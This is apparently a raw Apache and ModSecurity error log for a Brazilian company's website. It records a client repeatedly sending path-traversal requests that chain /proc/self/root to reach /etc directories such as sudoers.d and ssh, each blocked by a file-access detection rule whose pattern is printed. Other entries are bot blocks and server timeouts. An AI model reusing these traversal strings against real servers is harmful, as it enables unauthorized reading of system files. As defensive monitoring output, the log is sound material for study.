[hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuFxCii7xarUs8iHYB4QAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:51.259272 2026] [mime_magic:error] [pid 7032:tid 140411607643904] (70014)End of file found: [client 74.7.243.128:53854] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 14:10:57.199748 2026] [:error] [pid 7545:tid 140411733534464] [client 74.7.243.128:53868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuIX8B84UptSoTJtYndgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:11:01.025363 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.243.128:37256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuJQbLMZ6AikZjR9V3DAAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:11:06.223283 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:37266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuKv-YZRR_7pZ7nDKktgAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:11:14.457782 2026] [proxy_fcgi:error] [pid 7032:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:11:42.086570 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:12:09.137789 2026] [proxy_fcgi:error] [pid 7545:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59938] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:12:28.846741 2026] [:error] [pid 7032:tid 140411741927168] [client 74.7.228.61:50100] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwufHOoiBhmblfxy7FSagAAAIA"]
[Thu Mar 19 14:12:33.121798 2026] [proxy_fcgi:error] [pid 7032:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:12:43.666891 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.244.43:55596] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwui-oXxyEfFpUF8f8mLAAAAUo"]
[Thu Mar 19 14:12:56.101868 2026] [proxy_fcgi:error] [pid 7032:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:32932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:13:24.065828 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:13:33.825113 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:57640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuvRCii7xarUs8iHYCQAAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:13:50.137817 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:13:51.049108 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:44586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuzwbLMZ6AikZjR9V3WAAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:14:16.138161 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35184] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:14:17.000871 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:54818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwu6BCii7xarUs8iHYCdgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:14:34.355793 2026] [:error] [pid 7032:tid 140411548894976] [client 74.7.243.128:42962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwu-XOoiBhmblfxy7FSogAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:14:37.129797 2026] [proxy_fcgi:error] [pid 7032:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:15:06.669911 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:15:14.584582 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:51868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvIuoXxyEfFpUF8f8mdgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:15:28.061872 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:15:29.731642 2026] [core:alert] [pid 7545:tid 140411725141760] [client 57.141.18.99:39686] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:15:32.395479 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:48540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvNPqxLDW4GITHUkSCEQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:15:44.543739 2026] [core:alert] [pid 17887:tid 140411683178240] [client 57.141.18.118:40014] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:15:52.109823 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37642] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:16:12.588642 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:58820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvXAbLMZ6AikZjR9V3iQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:16:14.133842 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38296] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:16:20.324613 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:41854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvZPqxLDW4GITHUkSCTAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:16:27.213780 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:53028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwva8df6f5d65gmYZST8QAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:16:37.479134 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:34312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvdda6ubjKNq_cu4ZwigAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:16:39.125840 2026] [proxy_fcgi:error] [pid 7545:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:16:50.860059 2026] [core:alert] [pid 7545:tid 140411548894976] [client 57.141.18.13:41676] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:17:04.118688 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:17:27.119906 2026] [core:alert] [pid 7545:tid 140411616036608] [client 74.7.243.128:46456] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var
[Thu Mar 19 14:17:27.689634 2026] [:error] [pid 7545:tid 140411641214720] [client 74.7.243.128:49270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvp38B84UptSoTJtYoUwAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:17:31.538910 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.228.61:49410] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwvq-oXxyEfFpUF8f8mrgAAAUw"]
[Thu Mar 19 14:17:33.129782 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:17:33.167550 2026] [:error] [pid 8307:tid 140411674785536] [client 74.7.243.128:46832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvrb-FhjpZGs9ba8qE7wAAAwg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:17:38.217372 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:46838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwvsl_V7PWP6ixUYl7W4gAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:17:38.575457 2026] [mime_magic:error] [pid 8307:tid 140411574073088] (70014)End of file found: [client 57.141.18.34:42696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:17:47.897798 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.244.43:34278] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwvu_-YZRR_7pZ7nDKlYQAAA8Y"]
[Thu Mar 19 14:17:56.137837 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40866] AH01075: Error dispatching request to : (polling)
